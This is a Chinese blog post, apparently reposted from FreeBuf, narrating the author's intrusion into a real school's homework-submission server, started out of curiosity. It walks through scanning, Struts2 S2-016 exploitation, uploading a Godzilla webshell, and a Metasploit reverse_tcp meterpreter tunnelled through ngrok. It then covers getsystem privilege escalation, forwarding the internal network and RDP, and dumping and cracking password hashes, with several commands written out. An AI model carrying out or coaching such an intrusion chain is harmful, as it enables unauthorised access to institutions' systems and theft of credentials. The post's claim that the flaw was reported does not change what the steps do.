记录一次完整的教育站点渗透过程

admin 2024年2月20日06:50:35评论27 views字数 2122阅读7分4秒阅读模式

*该漏洞已上报相应学校管理员。

目录

前言  漏洞发现  漏洞验证  漏洞利用  Get webshell提权Hash读取尾言


前言

今天又是风和日丽的一天,莫名其妙搞到学校会计系的一个文档,好奇心促使我点开看了一眼,发现了一个作业提交平台,ip为:*.*.*.114:9100,看着这熟悉的ip,我又点开了那尘封已久的信息收集导图。

记录一次完整的教育站点渗透过程

发现貌似并没有做太详细的收集,于是,我又打开了那令人爱恨不得的nmap,开始了漫长的等待……

记录一次完整的教育站点渗透过程

漏洞发现

经过一番搏斗,大概了解了目标,接下来,又是各种摸索伦打,尝试各种,手工注入、密码爆破……无果… 你以为我这就放弃了?没错是打算放弃了,当我正准备关机时,“一束光照在了avws上”我抱着试一试的心态,扫了一下目标站点,不扫不知道一扫吓一跳啊,比惊喜更惊喜的无疑是这个凸显眼前的Struts2漏洞,这确实是让我没想到的没想到。

记录一次完整的教育站点渗透过程

漏洞验证

根据avws提供的路径,接下来我们便去做了个小小的漏洞验证,首先去GitHub上了Struts2的小工具包,是由python3编写,下载解压完,打开我们的dos终端,用python.exe Struts2Scan.py -u url

记录一次完整的教育站点渗透过程

可以看到漏洞s2-016确实存在,虽然有点老,不管哈哈哈。

漏洞利用

又恰好在我的工具包里有一个2018年的Struts2的exp整合利用包,上去看一下,也还好,可以用S2-016,接下来就是惊心动魄的时候了,输入漏洞存在的路径,选择exp,一键捅穿。

记录一次完整的教育站点渗透过程
记录一次完整的教育站点渗透过程

可以看到,已经利用成功了,接下来whoami看看权限,可以看到,administratora权限,哟还挺高。(这里解释一下,jsp脚本的站点,一般情况下,只要不被降权,都会继承administrator权限)

Get webshell

你以为拿到个shell就结束了吗,当然不是,由于工具限制,这里我们考虑上个大马,功能更齐全,方便下一步的。

记录一次完整的教育站点渗透过程
记录一次完整的教育站点渗透过程
渗透却发现,能上传上去,却连接不了,怎么办呢?难不成就此结束?那不可能,细细摸索一番后,恍然大悟,原来是它的tomaca版本太低,执行不了我们的大马,那咋办呢……一番思索,想起了哥斯拉大战变形金刚,那就用哥斯拉试试吧,

记录一次完整的教育站点渗透过程

首先用哥斯拉生成个脚本,然后,我们再上传到服务器,接下来,激动人心的时候到了,用哥斯拉成功链接!由于是第一次用哥斯拉的马,这个马确实功能有点惨不忍睹,一番熟悉,发现这个马儿居然集成了一个msf,那好玩了呀。

记录一次完整的教育站点渗透过程

提权

虽然它本身就是个administrator权限,但我依旧觉得system权限更香。接下来,便是我们的各种提权操作,考虑到服务器上有360,做个免杀吧,太麻烦了,干脆,写个无文件加载到内存,由于出生在一个风吹雨淋的小山村,兜里的money不允许我随意嚯嚯,于是,先上去ngrok做个免费的隧道吧,慢是慢了点,比没有好吧。

记录一次完整的教育站点渗透过程

隧道做好了,先连接一下我们的kali,在kali里下载一个ngrok客户端,然后连接上我们的隧道。

记录一次完整的教育站点渗透过程

接下来,生成并侦听个无文件的payload ,handler -p windows/meterpreter/reverse_tcp -H 127.0.0.1 -P 80

记录一次完整的教育站点渗透过程

在另外一边,哥斯拉上的msf中,连接我们的ngrok的一个地址,并发送,等待session回来

记录一次完整的教育站点渗透过程

可以看到,找个很让人头疼的东西,导致我的session一直没有回弹,无限重连。

记录一次完整的教育站点渗透过程

排查了一下原因,本以为是隧道问题,氪金去买了个隧道,回过头再尝试连接……并无卵用白浪费我一顿饭钱。

记录一次完整的教育站点渗透过程

思索一番后,我拿上了我的电脑,去了图书馆,session回弹成功了,跟我想的一样,在此建议亲爱的校长,能不能把宿舍的网络带宽换高点,20Mb真的不够用,好了咱继续。

这个时候,我们的session已经过来了。

记录一次完整的教育站点渗透过程

日常getuid可以看到是administrator权限,接下来,该想办法提权了,还是考虑到有360的原因很麻烦,这时候只能碰碰运气试试会话劫持了。

记录一次完整的教育站点渗透过程

直接getsystem试试,劫持成功。

接下来,再getuid可以看到,我们已经是system权限了。

记录一次完整的教育站点渗透过程

3389端口转发连接:

这步就很easy了,首先咱先看看,它的3389有没有开,netstat -a,可以看到3389是开放了的。

记录一次完整的教育站点渗透过程

然后ipconfig看一下内网ip

记录一次完整的教育站点渗透过程

打开autorouter 转发整个内网c段吧

记录一次完整的教育站点渗透过程

再然后直接用portfwd将它的3389转到我们本地的9998就可以了

记录一次完整的教育站点渗透过程

我们在打开一个终端,用rdesktop直接去链接我们本地,刚才转发出来的端口就可以了,连接上后看到需要密码,那咋办呢,思考一下。

往下,我们现在是提权到了system权限的可以去读取它的一个hash

Hash读取

利用kali自带的小脚本,run post/windows/gather/smart_hashdump

记录一次完整的教育站点渗透过程

可以看到,hash已经读取出来了,找个解密站点解开就行了,拿着解出来的密码,可以看到,我们已经是顺利的登录上了,是台08的服务器。

记录一次完整的教育站点渗透过程

记录一次完整的教育站点渗透过程

尾言

因为部分原因后续的权限维持和横向渗透就不做了,各位有兴趣的可以搭建一个tomcat的靶场复现一下,有什么问题欢迎评论区留言。

本文作者:Segador, 转载请注明来自FreeBuf.COM

原文始发于微信公众号(Hacking黑白红):记录一次完整的教育站点渗透过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月20日06:50:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记录一次完整的教育站点渗透过程http://cn-sec.com/archives/2507111.html

发表评论

匿名网友 填写信息